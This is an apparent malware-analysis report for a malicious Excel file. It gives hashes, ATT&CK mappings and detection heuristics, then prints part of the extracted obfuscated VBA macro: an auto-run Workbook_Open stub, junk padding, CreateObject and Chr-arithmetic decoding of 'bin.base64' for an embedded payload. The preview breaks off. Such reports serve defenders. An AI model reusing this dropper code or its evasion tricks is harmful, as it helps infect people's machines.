Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3893b0177c5424cd…

MALICIOUS

Office (OLE)

52.0 KB Created: 2018-09-11 09:27:44 Authoring application: Microsoft Excel First seen: 2019-01-12
MD5: f168a2b40c786f13716171b0aaa91bf0 SHA-1: 8ed5f77afb363bd46acb86a26cdd4b460acc48ef SHA-256: 3893b0177c5424cd4178d107b19fe7d414427fe73fbdff98ca96b57fa0f11f35
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Workbook_Open event, which is a common technique for initial execution. The macro uses obfuscation, including splitting keywords, and calls CreateObject, indicating it likely attempts to download and execute a secondary payload. The absence of specific IOCs and clear payload indicators limits confidence in family attribution.

Heuristics 6

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11271 bytes
SHA-256: 06fb008fe9cc9df6cf41ea48895bdbfa34765ab98e9e1e0b635b62562c851db1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
XSbA.du4rzj4tnqkRFHJjG4s9
While 11 = 33
Dim QmFxUrOgl_1_8_r As Boolean
Wend
Dim nvtkSfhDakCrT As Worksheet
While 9 = 44
Dim xBP_EZ91nEVFSV As Boolean
Wend
Dim FmzfTEYexVQX As Worksheet
While 8 = 58
Dim bshnKR_5rjr As Boolean
Wend
Dim v8f_19oWd_H As Worksheet
While 6 = 30
Dim ZZj_rk4RL4vp As Boolean
Wend
Dim OQ_3DEXnf5Dgw_g As Worksheet

While 13 = 42
Dim eG9wXSQGCE As Boolean
Wend
Dim jW_XVx_Phti9v As Worksheet
While 11 = 33
Dim SWjc4efg4eV As Boolean
Wend
Dim v_48Pn7H6vbr As Worksheet
While 14 = 51
Dim XNHEDONT8eUoXx As Boolean
Wend
Dim yWleho1llQ4A As Worksheet
While 6 = 33
Dim vYC_zoKMuXbPn As Boolean
Wend
Dim JXOsNhbxifYLwz As Worksheet
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "XSbA"
Dim gzj1oriaM6PdEEVCNf9DNxGcMFhRMo83yp1zGyMeLZYo48_uN2TQRbasqEmhIPMg8WoXMe5YRb1xWbiOAvCTToiUMGGAKnU6L1qeQpgs749ykmT As String
Dim r4XsLSmImiGRB9wl2wDsvNXS7P2XQdFVmToVqrfOfYz9kNi8Iekctb1cdDu6ZM1GaunqRZ5IOwKVWXqrp3Nv3mlJbK1l6iyRgq As String
Dim Zbh57O6gqs9ANu8_eVHPKFGI6gFGauPKwo7cF12dp3nO_iq86uS2wrwRTW9YHx_6awMiwc3ndmiRb2IUyHKpZXXD2mHr2bU2wqwKUGIb1oVHHdzaMli_kXdCXIpISJuBQqdt_7_p8syuAN5WvqdN2 As String
Dim XyyL7RV5vIgPQfjrOTnyhv4K_q_lOqBWhJOkq2NjOzOo2SkoyRCRJ7xl5lKNQto_FHqFP8_V_DireN As Integer

 Function ul1KBOTggbTyslkkMCPApMUhnag_L3lvByYj4LYARmzwW(QxMp6_1Ihq1tJJGhEpnUC1xycEAb2bNEI_jm8THBW_rSgn4Us8De2zVZ9XKz9XPEatiJiditgk77GcPyKn)
While 17 = 50
Dim hiScZYfHKP1 As Boolean
Wend
Dim UT8yw7TtU_D As Worksheet
While 8 = 55
Dim h7Y9X3yxx1wmY As Boolean
Wend
Dim F1kOwict7F As Worksheet

 Dim IoBHa5Kvr7a3LKUFolNlbzeJ4grlaQR9NytanbjHiKjMHeGl_juGvqlSHzN3KhSYnamVZ3aLBECOOQAXYEg1fJLgLZ
While 17 = 50
Dim HZWT5IBNCdA As Boolean
Wend
Dim UDZ_lRVb9h As Worksheet
While 5 = 41
Dim ph4oEschZjx_Q As Boolean
Wend
Dim z8ec3nygi53uw As Worksheet


   Dim d54fsaWrhTWycUcO7bCdbHFcxQoTWbIqwS3gDIs_Bi55GqlB_u9RJkXUxZqZuBS
While 26 = 50
Dim IOIOEP7ha1cnyY As Boolean
Wend
Dim hpl4LTviBFycxI_ As Worksheet
While 15 = 49
Dim Em_4RhMWIcf As Boolean
Wend
Dim CsXEBxCMP17_ As Worksheet
   
While 28 = 53
Dim pY_iLCZkbvgTMb As Boolean
Wend
Dim tfzSQaYoQBJ5D_ As Worksheet
While 10 = 55
Dim Zi3HHlSdQ8_Ts As Boolean
Wend
Dim DOKC2hDfV6hej As Worksheet
 Set d54fsaWrhTWycUcO7bCdbHFcxQoTWbIqwS3gDIs_Bi55GqlB_u9RJkXUxZqZuBS = CreateObject(r4XsLSmImiGRB9wl2wDsvNXS7P2XQdFVmToVqrfOfYz9kNi8Iekctb1cdDu6ZM1GaunqRZ5IOwKVWXqrp3Nv3mlJbK1l6iyRgq)
While 15 = 31
Dim F8XQ8YJ23WJjHON As Boolean
Wend
Dim S7qgkBzFCe As Worksheet
While 10 = 32
Dim K7jmBRVRiq As Boolean
Wend
Dim VSpJVw1PYxQdkk As Worksheet
   gzj1oriaM6PdEEVCNf9DNxGcMFhRMo83yp1zGyMeLZYo48_uN2TQRbasqEmhIPMg8WoXMe5YRb1xWbiOAvCTToiUMGGAKnU6L1qeQpgs749ykmT = Chr(307 - 209) & Chr(414 - 309) & Chr(422 - 312) & Chr(372 - 326) & Chr(388 - 290) & Chr(216 - 119) & Chr(341 - 226) & Chr(125 - 24) & Chr(397 - 343) & Chr(122 - 70)
While 12 = 55
Dim wCX_GPNbcP As Boolean
Wend
Dim p6wghz25Qli As Worksheet
While 24 = 37
Dim WzYoBOu_Gkp As Boolean
Wend
Dim T9y84QJRb3 As Worksheet
  Set IoBHa5Kvr7a3LKUFolNlbzeJ4grlaQR9NytanbjHiKjMHeGl_juGvqlSHzN3KhSYnamVZ3aLBECOOQAXYEg1fJLgLZ = d54fsaWrhTWycUcO7bCdbHFcxQoTWbIqwS3gDIs_Bi55GqlB_u9RJkXUxZqZuBS.createElement("NfVgWL3LQwRJE")
While 3 = 45
Dim yYdY9Srh5UL9AXK As Boolean
Wend
Dim X_AcVUn9jxqi As Worksheet
While 27 = 53
Dim is9HpgZ5NC5Bf As Boolean
Wend
Dim KNcU7Yv52EQ8fct As Worksheet
  IoBHa5Kvr7a3LKUFolNlbzeJ4grlaQR9NytanbjHiKjMHeGl_juGvqlSHzN3KhSYnamVZ3aLBECOOQAXYEg1fJLgLZ.DataType = gzj1oria
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.